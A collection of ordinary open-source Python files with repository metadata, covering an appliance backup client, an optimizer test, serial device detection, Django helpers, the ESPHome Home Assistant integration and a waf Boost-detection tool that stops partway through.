from authenticate import authenticate
class backup(object):
def __init__(self, auth, hostname, port=4712, https=True):
self.auth = auth
self.hostname = hostname
self.port = port
self.https = https
def performBackup(self):
r = self.auth.get(self.backupURL())
return r.text
def backupURL(self):
a = authenticate(hostname=self.hostname, port=self.port, https=self.https)
return a.createAppendURL(string='backup')
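# Usage sketch (hypothetical host; `auth` must expose a requests-like .get(),
# as produced by the sibling `authenticate` module imported above):
#
#   job = backup(auth, 'mwg.example.com')
#   print(job.performBackup())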
|
ColinKeigher/McAfeeWebGateway
|
mwg/backup.py
|
Python
|
gpl-2.0
| 503
|
# Copyright 2017,2018,2019,2020,2021 Sony Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import pytest
import nnabla.solvers as S
import numpy as np
from solver_test_utils import solver_tester, RefSolver
from nbla_test_utils import list_context
ctxs = list_context('Adam')
class RefAdam(RefSolver):
def __init__(self, alpha, beta1, beta2, eps):
self.alpha = alpha
self.beta1 = beta1
self.beta2 = beta2
self.eps = eps
self.m = {}
self.v = {}
self.t = {}
def _set_state_impl(self, key, param):
self.m[key] = np.zeros_like(param)
self.v[key] = np.zeros_like(param)
self.t[key] = 0
def _update_impl(self, key, p, g):
self.t[key] = min(self.t[key] + 1, np.iinfo(np.int32).max)
_update_adam(p, g, self.m[key], self.v[key], self.t[key],
self.alpha, self.beta1, self.beta2, self.eps)
def _update_adam(p, g, m, v, t, alpha, beta1, beta2, eps):
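    # alpha_t folds Adam's bias corrections into the step size:
    #   alpha_t = alpha * sqrt(1 - beta2**t) / (1 - beta1**t)
    # so the update below equals the textbook m_hat / (sqrt(v_hat) + eps)
    # rule, up to where eps is applied relative to the v bias correction.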
alpha_t = alpha * \
np.sqrt(1. - beta2 ** t) / (1. - beta1 ** t)
m[...] = beta1 * m + (1 - beta1) * g
v[...] = beta2 * v + (1 - beta2) * g * g
p[...] = p - alpha_t * m / (np.sqrt(v) + eps)
@pytest.mark.parametrize("ctx, solver_name", ctxs)
@pytest.mark.parametrize("decay", [1e-4])
@pytest.mark.parametrize("alpha", [1e-2, 1e-4])
@pytest.mark.parametrize("beta1, beta2", [(0.9, 0.999), (0.999, 0.9)])
@pytest.mark.parametrize("eps", [1e-8])
@pytest.mark.parametrize("seed", [313])
def test_adam(seed, alpha, beta1, beta2, eps, decay, ctx, solver_name):
rng = np.random.RandomState(seed)
solver_tester(
rng, S.Adam, RefAdam, [alpha, beta1, beta2, eps], atol=1e-6,
ctx=ctx, solver_name=solver_name)
|
sony/nnabla
|
python/test/solver/test_adam.py
|
Python
|
apache-2.0
| 2,232
|
from dogapi.stats.dog_stats_api import DogStatsApi
|
GbalsaC/bitnamiP
|
venv/lib/python2.7/site-packages/dogapi/stats/__init__.py
|
Python
|
agpl-3.0
| 51
|
import serial.tools.list_ports
import fermentrack_django.settings
import os
import pickle
# from . import udev_integration
DEVICE_CACHE_FILENAME = fermentrack_django.settings.ROOT_DIR / 'device.cache'
known_devices = {
'arduino': [
# Those with 'generic': False are virtually guaranteed to be Arduinos
{'vid': 0x2341, 'pid': 0x0010, 'name': "Arduino Mega2560", 'generic': False},
{'vid': 0x2341, 'pid': 0x8036, 'name': "Arduino Leonardo", 'generic': False},
{'vid': 0x2341, 'pid': 0x0036, 'name': "Arduino Leonardo Bootloader", 'generic': False},
{'vid': 0x2341, 'pid': 0x0043, 'name': "Arduino Uno", 'generic': False},
{'vid': 0x2341, 'pid': 0x0001, 'name': "Arduino Uno", 'generic': False},
{'vid': 0x2a03, 'pid': 0x0010, 'name': "Arduino Mega2560", 'generic': False},
{'vid': 0x2a03, 'pid': 0x8036, 'name': "Arduino Leonardo", 'generic': False},
{'vid': 0x2a03, 'pid': 0x0036, 'name': "Arduino Leonardo Bootloader", 'generic': False},
{'vid': 0x2a03, 'pid': 0x0043, 'name': "Arduino Uno", 'generic': False},
{'vid': 0x2a03, 'pid': 0x0001, 'name': "Arduino Uno", 'generic': False},
# While those with 'generic': True use a generic USB to UART bridge
{'vid': 0x1a86, 'pid': 0x7523, 'name': "Generic USB-Serial Chip", 'generic': True},
{'vid': 0x1D50, 'pid': 0x607D, 'name': "Generic CP2104 USB-Serial Chip", 'generic': True}, # Not sure if this is used on any Arduino clones
],
'particle': [
{'vid': 0x1D50, 'pid': 0x607D, 'name': "Particle Core", 'generic': True}, # Particle Core uses a generic CP2104 SLAB USBtoUART Chip
        {'vid': 0x2B04, 'pid': 0xC006, 'name': "Particle Photon", 'generic': False},
],
'esp8266': [
{'vid': 0x1D50, 'pid': 0x607D, 'name': "Generic CP2104 USB-Serial Chip", 'generic': True},
],
'esp32': [
{'vid': 0x1D50, 'pid': 0x607D, 'name': "Generic CP2104 USB-Serial Chip", 'generic': True},
]
}
def check_known_devices(family, pid, vid, return_bool=False):
unknown_device = {'name': "Unknown", 'generic': True}
if family not in known_devices:
if return_bool:
return False
else:
return unknown_device
device_list = known_devices[family]
for this_device in device_list:
if this_device['vid'] == vid and this_device['pid'] == pid:
if return_bool:
return True
else:
return {'name': this_device['name'], 'generic': this_device['generic']}
if return_bool:
return False
else:
return unknown_device
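# Example lookups against the table above:
#   check_known_devices('arduino', pid=0x0043, vid=0x2341)
#       -> {'name': 'Arduino Uno', 'generic': False}
#   check_known_devices('arduino', pid=0x0043, vid=0x2341, return_bool=True)
#       -> True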
def write_list_to_file(devices, filename):
with open(filename, 'wb') as fp:
pickle.dump(devices, fp)
def read_list_from_file(filename):
with open(filename, 'rb') as fp:
devices = pickle.load(fp)
return devices
def cache_current_devices():
    ports = list(serial.tools.list_ports.comports())
    current_devices = [p.device for p in ports]
    write_list_to_file(current_devices, DEVICE_CACHE_FILENAME)
return current_devices
def compare_current_devices_against_cache(family="arduino"):
    ports = list(serial.tools.list_ports.comports())
    # We read current_devices the same as above
    current_devices = [p.device for p in ports]
# We read in existing_devices from the device.cache file we (presumably) created earlier
existing_devices = read_list_from_file(DEVICE_CACHE_FILENAME)
    # New devices are any devices that show up now (but didn't show before)
new_devices = list(set(current_devices) - set(existing_devices))
# Once we have current_devices, existing_devices, and new_devices, let's enrich new_devices
new_devices_enriched = []
for p in ports:
if p.device in new_devices:
known_device = check_known_devices(family, p.pid, p.vid)
enriched_device = {'vid': p.vid, 'pid': p.pid, 'device': p.device, 'description': p.description,
'known_name': known_device['name'], 'known_generic': known_device['generic']}
new_devices_enriched.append(enriched_device)
# And now, let's return all four lists for good measure. We can discard the ones we don't want.
return existing_devices, current_devices, new_devices, new_devices_enriched
# The following was used for testing during development
if __name__ == "__main__":
# cache_current_devices()
existing_devices, current_devices, new_devices, new_devices_enriched = compare_current_devices_against_cache("arduino")
pass
|
thorrak/fermentrack
|
app/serial_integration.py
|
Python
|
mit
| 4,779
|
from django.conf.urls import url
from . import views
urlpatterns = [
url(r'news/$', views.post_list, name='postlist'),
url(r'submit/$', views.submit_post, name='submitpost'),
url(r'news/(?P<post_slug>[-\w]+)/$', views.post_view, name='postview'),
url(r'news/(?P<post_slug>[-\w]+)/(?P<comment_pk>\d+)$', views.comment_perma, name='commentperma'),
url(r'commentreply/(?P<comment_pk>\d+)/$', views.comment_reply, name='commentreply'),
url(r'ajax/postvote/$', views.post_vote, name='postvote'),
url(r'ajax/commentvote/$', views.comment_vote, name='commentvote'),
]
|
Jaxkr/TruthBot.org
|
Truthbot/news/urls.py
|
Python
|
gpl-2.0
| 591
|
"""Support for esphome devices."""
import asyncio
import logging
import math
from typing import Any, Callable, Dict, List, Optional
from aioesphomeapi import (
APIClient,
APIConnectionError,
DeviceInfo,
EntityInfo,
EntityState,
HomeassistantServiceCall,
UserService,
UserServiceArgType,
)
import voluptuous as vol
from homeassistant import const
from homeassistant.components import zeroconf
from homeassistant.config_entries import ConfigEntry
from homeassistant.const import (
CONF_HOST,
CONF_PASSWORD,
CONF_PORT,
EVENT_HOMEASSISTANT_STOP,
)
from homeassistant.core import Event, State, callback
from homeassistant.exceptions import TemplateError
from homeassistant.helpers import template
import homeassistant.helpers.config_validation as cv
import homeassistant.helpers.device_registry as dr
from homeassistant.helpers.dispatcher import async_dispatcher_connect
from homeassistant.helpers.entity import Entity
from homeassistant.helpers.event import async_track_state_change_event
from homeassistant.helpers.json import JSONEncoder
from homeassistant.helpers.storage import Store
from homeassistant.helpers.template import Template
from homeassistant.helpers.typing import ConfigType, HomeAssistantType
# Import config flow so that it's added to the registry
from .config_flow import EsphomeFlowHandler # noqa: F401
from .entry_data import DATA_KEY, RuntimeEntryData
DOMAIN = "esphome"
_LOGGER = logging.getLogger(__name__)
STORAGE_VERSION = 1
# No config schema - only configuration entry
CONFIG_SCHEMA = vol.Schema({}, extra=vol.ALLOW_EXTRA)
async def async_setup(hass: HomeAssistantType, config: ConfigType) -> bool:
"""Stub to allow setting up this component.
Configuration through YAML is not supported at this time.
"""
return True
async def async_setup_entry(hass: HomeAssistantType, entry: ConfigEntry) -> bool:
"""Set up the esphome component."""
hass.data.setdefault(DATA_KEY, {})
host = entry.data[CONF_HOST]
port = entry.data[CONF_PORT]
password = entry.data[CONF_PASSWORD]
device_id = None
zeroconf_instance = await zeroconf.async_get_instance(hass)
cli = APIClient(
hass.loop,
host,
port,
password,
client_info=f"Home Assistant {const.__version__}",
zeroconf_instance=zeroconf_instance,
)
# Store client in per-config-entry hass.data
store = Store(
hass, STORAGE_VERSION, f"esphome.{entry.entry_id}", encoder=JSONEncoder
)
entry_data = hass.data[DATA_KEY][entry.entry_id] = RuntimeEntryData(
client=cli, entry_id=entry.entry_id, store=store
)
async def on_stop(event: Event) -> None:
"""Cleanup the socket client on HA stop."""
await _cleanup_instance(hass, entry)
# Use async_listen instead of async_listen_once so that we don't deregister
# the callback twice when shutting down Home Assistant.
# "Unable to remove unknown listener <function EventBus.async_listen_once.<locals>.onetime_listener>"
entry_data.cleanup_callbacks.append(
hass.bus.async_listen(EVENT_HOMEASSISTANT_STOP, on_stop)
)
@callback
def async_on_state(state: EntityState) -> None:
"""Send dispatcher updates when a new state is received."""
entry_data.async_update_state(hass, state)
@callback
def async_on_service_call(service: HomeassistantServiceCall) -> None:
"""Call service when user automation in ESPHome config is triggered."""
domain, service_name = service.service.split(".", 1)
service_data = service.data
if service.data_template:
try:
data_template = {
key: Template(value) for key, value in service.data_template.items()
}
template.attach(hass, data_template)
service_data.update(
template.render_complex(data_template, service.variables)
)
except TemplateError as ex:
_LOGGER.error("Error rendering data template for %s: %s", host, ex)
return
if service.is_event:
# ESPHome uses servicecall packet for both events and service calls
# Ensure the user can only send events of form 'esphome.xyz'
if domain != "esphome":
_LOGGER.error(
"Can only generate events under esphome domain! (%s)", host
)
return
# Call native tag scan
if service_name == "tag_scanned":
tag_id = service_data["tag_id"]
hass.async_create_task(
hass.components.tag.async_scan_tag(tag_id, device_id)
)
return
hass.bus.async_fire(service.service, service_data)
else:
hass.async_create_task(
hass.services.async_call(
domain, service_name, service_data, blocking=True
)
)
async def send_home_assistant_state_event(event: Event) -> None:
"""Forward Home Assistant states updates to ESPHome."""
new_state = event.data.get("new_state")
if new_state is None:
return
entity_id = event.data.get("entity_id")
await cli.send_home_assistant_state(entity_id, new_state.state)
async def _send_home_assistant_state(
entity_id: str, new_state: Optional[State]
) -> None:
"""Forward Home Assistant states to ESPHome."""
await cli.send_home_assistant_state(entity_id, new_state.state)
@callback
def async_on_state_subscription(entity_id: str) -> None:
"""Subscribe and forward states for requested entities."""
unsub = async_track_state_change_event(
hass, [entity_id], send_home_assistant_state_event
)
entry_data.disconnect_callbacks.append(unsub)
new_state = hass.states.get(entity_id)
if new_state is None:
return
# Send initial state
hass.async_create_task(_send_home_assistant_state(entity_id, new_state))
async def on_login() -> None:
"""Subscribe to states and list entities on successful API login."""
nonlocal device_id
try:
entry_data.device_info = await cli.device_info()
entry_data.available = True
device_id = await _async_setup_device_registry(
hass, entry, entry_data.device_info
)
entry_data.async_update_device_state(hass)
entity_infos, services = await cli.list_entities_services()
await entry_data.async_update_static_infos(hass, entry, entity_infos)
await _setup_services(hass, entry_data, services)
await cli.subscribe_states(async_on_state)
await cli.subscribe_service_calls(async_on_service_call)
await cli.subscribe_home_assistant_states(async_on_state_subscription)
hass.async_create_task(entry_data.async_save_to_store())
except APIConnectionError as err:
_LOGGER.warning("Error getting initial data for %s: %s", host, err)
# Re-connection logic will trigger after this
await cli.disconnect()
try_connect = await _setup_auto_reconnect_logic(hass, cli, entry, host, on_login)
async def complete_setup() -> None:
"""Complete the config entry setup."""
infos, services = await entry_data.async_load_from_store()
await entry_data.async_update_static_infos(hass, entry, infos)
await _setup_services(hass, entry_data, services)
# Create connection attempt outside of HA's tracked task in order
# not to delay startup.
hass.loop.create_task(try_connect(is_disconnect=False))
hass.async_create_task(complete_setup())
return True
async def _setup_auto_reconnect_logic(
hass: HomeAssistantType, cli: APIClient, entry: ConfigEntry, host: str, on_login
):
"""Set up the re-connect logic for the API client."""
async def try_connect(tries: int = 0, is_disconnect: bool = True) -> None:
"""Try connecting to the API client. Will retry if not successful."""
if entry.entry_id not in hass.data[DOMAIN]:
# When removing/disconnecting manually
return
data: RuntimeEntryData = hass.data[DOMAIN][entry.entry_id]
for disconnect_cb in data.disconnect_callbacks:
disconnect_cb()
data.disconnect_callbacks = []
data.available = False
data.async_update_device_state(hass)
if is_disconnect:
# This can happen often depending on WiFi signal strength.
# So therefore all these connection warnings are logged
# as infos. The "unavailable" logic will still trigger so the
# user knows if the device is not connected.
_LOGGER.info("Disconnected from ESPHome API for %s", host)
if tries != 0:
# If not first re-try, wait and print message
# Cap wait time at 1 minute. This is because while working on the
# device (e.g. soldering stuff), users don't want to have to wait
# a long time for their device to show up in HA again (this was
# mentioned a lot in early feedback)
#
# In the future another API will be set up so that the ESP can
            # notify HA of connectivity directly, but for now we'll use a
# really short reconnect interval.
tries = min(tries, 10) # prevent OverflowError
wait_time = int(round(min(1.8 ** tries, 60.0)))
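            # For tries 1..7 this yields waits of roughly 2, 3, 6, 10, 19,
            # 34 and 60 seconds, then stays capped at 60 seconds.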
_LOGGER.info("Trying to reconnect to %s in %s seconds", host, wait_time)
await asyncio.sleep(wait_time)
try:
await cli.connect(on_stop=try_connect, login=True)
except APIConnectionError as error:
_LOGGER.info(
"Can't connect to ESPHome API for %s (%s): %s",
entry.unique_id,
host,
error,
)
# Schedule re-connect in event loop in order not to delay HA
# startup. First connect is scheduled in tracked tasks.
data.reconnect_task = hass.loop.create_task(
try_connect(tries + 1, is_disconnect=False)
)
else:
_LOGGER.info("Successfully connected to %s", host)
hass.async_create_task(on_login())
return try_connect
async def _async_setup_device_registry(
hass: HomeAssistantType, entry: ConfigEntry, device_info: DeviceInfo
):
"""Set up device registry feature for a particular config entry."""
sw_version = device_info.esphome_version
if device_info.compilation_time:
sw_version += f" ({device_info.compilation_time})"
device_registry = await dr.async_get_registry(hass)
entry = device_registry.async_get_or_create(
config_entry_id=entry.entry_id,
connections={(dr.CONNECTION_NETWORK_MAC, device_info.mac_address)},
name=device_info.name,
manufacturer="espressif",
model=device_info.model,
sw_version=sw_version,
)
return entry.id
async def _register_service(
hass: HomeAssistantType, entry_data: RuntimeEntryData, service: UserService
):
service_name = f"{entry_data.device_info.name}_{service.name}"
schema = {}
for arg in service.args:
schema[vol.Required(arg.name)] = {
UserServiceArgType.BOOL: cv.boolean,
UserServiceArgType.INT: vol.Coerce(int),
UserServiceArgType.FLOAT: vol.Coerce(float),
UserServiceArgType.STRING: cv.string,
UserServiceArgType.BOOL_ARRAY: [cv.boolean],
UserServiceArgType.INT_ARRAY: [vol.Coerce(int)],
UserServiceArgType.FLOAT_ARRAY: [vol.Coerce(float)],
UserServiceArgType.STRING_ARRAY: [cv.string],
}[arg.type_]
async def execute_service(call):
await entry_data.client.execute_service(service, call.data)
hass.services.async_register(
DOMAIN, service_name, execute_service, vol.Schema(schema)
)
async def _setup_services(
hass: HomeAssistantType, entry_data: RuntimeEntryData, services: List[UserService]
):
old_services = entry_data.services.copy()
to_unregister = []
to_register = []
for service in services:
if service.key in old_services:
# Already exists
matching = old_services.pop(service.key)
if matching != service:
# Need to re-register
to_unregister.append(matching)
to_register.append(service)
else:
# New service
to_register.append(service)
for service in old_services.values():
to_unregister.append(service)
entry_data.services = {serv.key: serv for serv in services}
for service in to_unregister:
service_name = f"{entry_data.device_info.name}_{service.name}"
hass.services.async_remove(DOMAIN, service_name)
for service in to_register:
await _register_service(hass, entry_data, service)
async def _cleanup_instance(
hass: HomeAssistantType, entry: ConfigEntry
) -> RuntimeEntryData:
"""Cleanup the esphome client if it exists."""
data: RuntimeEntryData = hass.data[DATA_KEY].pop(entry.entry_id)
if data.reconnect_task is not None:
data.reconnect_task.cancel()
for disconnect_cb in data.disconnect_callbacks:
disconnect_cb()
for cleanup_callback in data.cleanup_callbacks:
cleanup_callback()
await data.client.disconnect()
return data
async def async_unload_entry(hass: HomeAssistantType, entry: ConfigEntry) -> bool:
"""Unload an esphome config entry."""
entry_data = await _cleanup_instance(hass, entry)
tasks = []
for platform in entry_data.loaded_platforms:
tasks.append(hass.config_entries.async_forward_entry_unload(entry, platform))
if tasks:
await asyncio.wait(tasks)
return True
async def platform_async_setup_entry(
hass: HomeAssistantType,
entry: ConfigEntry,
async_add_entities,
*,
component_key: str,
info_type,
entity_type,
state_type,
) -> None:
"""Set up an esphome platform.
This method is in charge of receiving, distributing and storing
info and state updates.
"""
entry_data: RuntimeEntryData = hass.data[DOMAIN][entry.entry_id]
entry_data.info[component_key] = {}
entry_data.old_info[component_key] = {}
entry_data.state[component_key] = {}
@callback
def async_list_entities(infos: List[EntityInfo]):
"""Update entities of this platform when entities are listed."""
old_infos = entry_data.info[component_key]
new_infos = {}
add_entities = []
for info in infos:
if not isinstance(info, info_type):
# Filter out infos that don't belong to this platform.
continue
if info.key in old_infos:
# Update existing entity
old_infos.pop(info.key)
else:
# Create new entity
entity = entity_type(entry.entry_id, component_key, info.key)
add_entities.append(entity)
new_infos[info.key] = info
# Remove old entities
for info in old_infos.values():
entry_data.async_remove_entity(hass, component_key, info.key)
# First copy the now-old info into the backup object
entry_data.old_info[component_key] = entry_data.info[component_key]
# Then update the actual info
entry_data.info[component_key] = new_infos
# Add entities to Home Assistant
async_add_entities(add_entities)
signal = f"esphome_{entry.entry_id}_on_list"
entry_data.cleanup_callbacks.append(
async_dispatcher_connect(hass, signal, async_list_entities)
)
@callback
def async_entity_state(state: EntityState):
"""Notify the appropriate entity of an updated state."""
if not isinstance(state, state_type):
return
entry_data.state[component_key][state.key] = state
entry_data.async_update_entity(hass, component_key, state.key)
signal = f"esphome_{entry.entry_id}_on_state"
entry_data.cleanup_callbacks.append(
async_dispatcher_connect(hass, signal, async_entity_state)
)
def esphome_state_property(func):
"""Wrap a state property of an esphome entity.
This checks if the state object in the entity is set, and
prevents writing NAN values to the Home Assistant state machine.
"""
@property
def _wrapper(self):
if self._state is None:
return None
val = func(self)
if isinstance(val, float) and math.isnan(val):
# Home Assistant doesn't use NAN values in state machine
# (not JSON serializable)
return None
return val
return _wrapper
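# Usage sketch (hypothetical sensor entity; `self._state.state` is assumed
# to hold the raw value pushed by the device):
#
#   class MySensor(EsphomeEntity):
#       @esphome_state_property
#       def state(self):
#           return self._state.state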
class EsphomeEnumMapper:
"""Helper class to convert between hass and esphome enum values."""
def __init__(self, func: Callable[[], Dict[int, str]]):
"""Construct a EsphomeEnumMapper."""
self._func = func
def from_esphome(self, value: int) -> str:
"""Convert from an esphome int representation to a hass string."""
return self._func()[value]
def from_hass(self, value: str) -> int:
"""Convert from a hass string to a esphome int representation."""
inverse = {v: k for k, v in self._func().items()}
return inverse[value]
def esphome_map_enum(func: Callable[[], Dict[int, str]]):
"""Map esphome int enum values to hass string constants.
This class has to be used as a decorator. This ensures the aioesphomeapi
import is only happening at runtime.
"""
return EsphomeEnumMapper(func)
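# Usage sketch (illustrative fan-speed mapping, not a real component):
#
#   @esphome_map_enum
#   def _fan_speeds():
#       return {0: "low", 1: "medium", 2: "high"}
#
#   _fan_speeds.from_esphome(1)    # -> "medium"
#   _fan_speeds.from_hass("high")  # -> 2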
class EsphomeBaseEntity(Entity):
"""Define a base esphome entity."""
def __init__(self, entry_id: str, component_key: str, key: int):
"""Initialize."""
self._entry_id = entry_id
self._component_key = component_key
self._key = key
async def async_added_to_hass(self) -> None:
"""Register callbacks."""
self.async_on_remove(
async_dispatcher_connect(
self.hass,
(
f"esphome_{self._entry_id}_remove_"
f"{self._component_key}_{self._key}"
),
self.async_remove,
)
)
self.async_on_remove(
async_dispatcher_connect(
self.hass,
f"esphome_{self._entry_id}_on_device_update",
self._on_device_update,
)
)
@callback
def _on_device_update(self) -> None:
"""Update the entity state when device info has changed."""
if self._entry_data.available:
# Don't update the HA state yet when the device comes online.
# Only update the HA state when the full state arrives
# through the next entity state packet.
return
self.async_write_ha_state()
@property
def _entry_data(self) -> RuntimeEntryData:
return self.hass.data[DATA_KEY][self._entry_id]
@property
def _static_info(self) -> EntityInfo:
# Check if value is in info database. Use a single lookup.
info = self._entry_data.info[self._component_key].get(self._key)
if info is not None:
return info
        # This entity is in the removal process and has been removed from
        # .info already, so look it up in old_info instead.
return self._entry_data.old_info[self._component_key].get(self._key)
@property
def _device_info(self) -> DeviceInfo:
return self._entry_data.device_info
@property
def _client(self) -> APIClient:
return self._entry_data.client
@property
def _state(self) -> Optional[EntityState]:
try:
return self._entry_data.state[self._component_key][self._key]
except KeyError:
return None
@property
def available(self) -> bool:
"""Return if the entity is available."""
device = self._device_info
if device.has_deep_sleep:
# During deep sleep the ESP will not be connectable (by design)
# For these cases, show it as available
return True
return self._entry_data.available
@property
def unique_id(self) -> Optional[str]:
"""Return a unique id identifying the entity."""
if not self._static_info.unique_id:
return None
return self._static_info.unique_id
@property
def device_info(self) -> Dict[str, Any]:
"""Return device registry information for this entity."""
return {
"connections": {(dr.CONNECTION_NETWORK_MAC, self._device_info.mac_address)}
}
@property
def name(self) -> str:
"""Return the name of the entity."""
return self._static_info.name
@property
def should_poll(self) -> bool:
"""Disable polling."""
return False
class EsphomeEntity(EsphomeBaseEntity):
"""Define a generic esphome entity."""
async def async_added_to_hass(self) -> None:
"""Register callbacks."""
await super().async_added_to_hass()
self.async_on_remove(
async_dispatcher_connect(
self.hass,
(
f"esphome_{self._entry_id}"
f"_update_{self._component_key}_{self._key}"
),
self.async_write_ha_state,
)
)
|
tboyce021/home-assistant
|
homeassistant/components/esphome/__init__.py
|
Python
|
apache-2.0
| 21,801
|
from django.template.loader_tags import BlockNode, ExtendsNode
from django.template import loader, Context, RequestContext, TextNode
from django.http import HttpResponse
def get_template(template):
if isinstance(template, (tuple, list)):
return loader.select_template(template)
return loader.get_template(template)
class BlockNotFound(Exception):
pass
def render_template_block(template, block, context):
"""
Renders a single block from a template. This template should have previously been rendered.
"""
return render_template_block_nodelist(template.nodelist, block, context)
def render_template_block_nodelist(nodelist, block, context):
for node in nodelist:
if isinstance(node, BlockNode) and node.name == block:
return node.render(context)
for key in ('nodelist', 'nodelist_true', 'nodelist_false'):
if hasattr(node, key):
try:
return render_template_block_nodelist(getattr(node, key), block, context)
                except BlockNotFound:
                    pass
for node in nodelist:
if isinstance(node, ExtendsNode):
try:
return render_template_block(node.get_parent(context), block, context)
except BlockNotFound:
pass
raise BlockNotFound
def render_block_to_string(template_name, block, dictionary=None, context_instance=None):
"""
Loads the given template_name and renders the given block with the given dictionary as
context. Returns a string.
"""
dictionary = dictionary or {}
t = get_template(template_name)
if context_instance:
context_instance.update(dictionary)
else:
context_instance = Context(dictionary)
t.render(context_instance)
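    # render_template_block requires a previously rendered template (see its
    # docstring), so render the full template first and discard the output.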
return render_template_block(t, block, context_instance)
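# Usage sketch (assumes a template 'article.html' that defines
# {% block content %} somewhere in its inheritance chain):
#
#   html = render_block_to_string('article.html', 'content',
#                                 {'object': some_object})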
def direct_block_to_template(request, template, block, extra_context=None, mimetype=None, **kwargs):
"""
Render a given block in a given template with any extra URL parameters in the context as
``{{ params }}``.
"""
if extra_context is None:
extra_context = {}
dictionary = {'params': kwargs}
for key, value in extra_context.items():
if callable(value):
dictionary[key] = value()
else:
dictionary[key] = value
c = RequestContext(request, dictionary)
t = get_template(template)
t.render(c)
return HttpResponse(render_template_block(t, block, c), mimetype=mimetype)
|
SpreadBand/SpreadBand
|
utils/template.py
|
Python
|
agpl-3.0
| 2,505
|
from django.core.management.base import BaseCommand, CommandError
import commonware.log
from olympia.access.models import Group, GroupUser
from olympia.users.models import UserProfile
class Command(BaseCommand):
help = ('Remove a user from a group. Syntax: \n'
' ./manage.py removeuserfromgroup <user_id|email> <group_id>')
log = commonware.log.getLogger('z.users')
def handle(self, *args, **options):
try:
do_removeuser(args[0], args[1])
msg = 'Removing {user} from {group}\n'.format(user=args[0],
group=args[1])
self.log.info(msg)
self.stdout.write(msg)
except IndexError:
raise CommandError(self.help)
def do_removeuser(user, group):
try:
if '@' in user:
user = UserProfile.objects.get(email=user)
elif user.isdigit():
user = UserProfile.objects.get(pk=user)
else:
raise CommandError('Unknown input for user.')
if group.isdigit():
group = Group.objects.get(pk=group)
else:
raise CommandError('Group must be a valid ID.')
# Doesn't actually check if the user was in the group or not.
GroupUser.objects.filter(user=user, group=group).delete()
# Help django-cache-machine invalidate its cache (it has issues with
# M2Ms).
Group.objects.invalidate(*user.groups.all())
except UserProfile.DoesNotExist:
raise CommandError('User ({user}) does not exist.'.format(user=user))
except Group.DoesNotExist:
raise CommandError('Group ({group}) does not exist.'
.format(group=group))
|
mstriemer/olympia
|
src/olympia/zadmin/management/commands/removeuserfromgroup.py
|
Python
|
bsd-3-clause
| 1,740
|
from MirrorAI.io.read import readCIFAR
import os
def main():
dir_data = os.path.join("..",
"data/cifar/cifar-10-batches-py"
)
f_meta = os.path.join(dir_data, "batches.meta")
data_files = [
os.path.join(dir_data, "data_batch_1"),
os.path.join(dir_data, "data_batch_2")
]
answer = readCIFAR(f_meta, data_files)
assert sorted(answer.keys()) == [
'batch_label',
'data',
'filenames',
'label_names',
'labels',
'num_cases_per_batch',
'num_vis']
assert len(answer['data']) == 20000
assert answer['data'][0].shape == (32, 32, 3)
    print("readCIFAR smoke test passed")
if __name__ == '__main__':
main()
|
yuhangwang/MirrorAI
|
mirror-ai/app/py/proxyMirrorAI.py
|
Python
|
mit
| 708
|
#!/usr/bin/env python
# encoding: utf-8
#
# partially based on boost.py written by Gernot Vormayr
# written by Ruediger Sonderfeld <ruediger@c-plusplus.de>, 2008
# modified by Bjoern Michaelsen, 2008
# modified by Luca Fossati, 2008
# rewritten for waf 1.5.1, Thomas Nagy, 2008
# rewritten for waf 1.6.2, Sylvain Rouquette, 2011
'''
This is an extra tool, not bundled with the default waf binary.
To add the boost tool to the waf file:
$ ./waf-light --tools=compat15,boost
or, if you have waf >= 1.6.2
$ ./waf update --files=boost
When using this tool, the wscript will look like:
def options(opt):
opt.load('compiler_cxx boost')
def configure(conf):
conf.load('compiler_cxx boost')
conf.check_boost(lib='system filesystem')
def build(bld):
bld(source='main.cpp', target='app', use='BOOST')
Options are generated, in order to specify the location of boost includes/libraries.
The `check_boost` configuration function lets you specify which boost libraries to use.
It can also provide default values for the --boost-static and --boost-mt command-line arguments.
Everything will be packaged together in a BOOST component that you can use.
When using MSVC, a lot of compilation flags need to match your BOOST build configuration:
- you may have to add /EHsc to your CXXFLAGS or define boost::throw_exception if BOOST_NO_EXCEPTIONS is defined.
Errors: C4530
- boost libraries will try to be smart and use the (pretty but often not useful) auto-linking feature of MSVC
  So before calling `conf.check_boost` you might want to disable it by adding:
conf.env.DEFINES_BOOST += ['BOOST_ALL_NO_LIB']
Errors:
- boost might also be compiled with /MT, which links the runtime statically.
If you have problems with redefined symbols,
self.env['DEFINES_%s' % var] += ['BOOST_ALL_NO_LIB']
self.env['CXXFLAGS_%s' % var] += ['/MD', '/EHsc']
Passing `--boost-linkage_autodetect` might help ensure a correct linkage in some basic cases.
'''
import sys
import re
from waflib import Utils, Logs, Errors
from waflib.Configure import conf
BOOST_LIBS = ['/usr/lib', '/usr/local/lib', '/opt/local/lib', '/sw/lib', '/lib', '/usr/lib/x86_64-linux-gnu', '/usr/lib/i386-linux-gnu', '/usr/local/ndn/lib']
BOOST_INCLUDES = ['/usr/include', '/usr/local/include', '/opt/local/include', '/sw/include', '/usr/local/ndn/include']
BOOST_VERSION_FILE = 'boost/version.hpp'
BOOST_VERSION_CODE = '''
#include <iostream>
#include <boost/version.hpp>
int main() { std::cout << BOOST_LIB_VERSION << ":" << BOOST_VERSION << std::endl; }
'''
BOOST_SYSTEM_CODE = '''
#include <boost/system/error_code.hpp>
int main() { boost::system::error_code c; }
'''
BOOST_THREAD_CODE = '''
#include <boost/thread.hpp>
int main() { boost::thread t; }
'''
# toolsets from {boost_dir}/tools/build/v2/tools/common.jam
PLATFORM = Utils.unversioned_sys_platform()
detect_intel = lambda env: (PLATFORM == 'win32') and 'iw' or 'il'
detect_clang = lambda env: (PLATFORM == 'darwin') and 'clang-darwin' or 'clang'
detect_mingw = lambda env: (re.search('MinGW', env.CXX[0])) and 'mgw' or 'gcc'
BOOST_TOOLSETS = {
'borland': 'bcb',
'clang': detect_clang,
'como': 'como',
'cw': 'cw',
'darwin': 'xgcc',
'edg': 'edg',
'g++': detect_mingw,
'gcc': detect_mingw,
'icpc': detect_intel,
'intel': detect_intel,
'kcc': 'kcc',
'kylix': 'bck',
'mipspro': 'mp',
'mingw': 'mgw',
'msvc': 'vc',
'qcc': 'qcc',
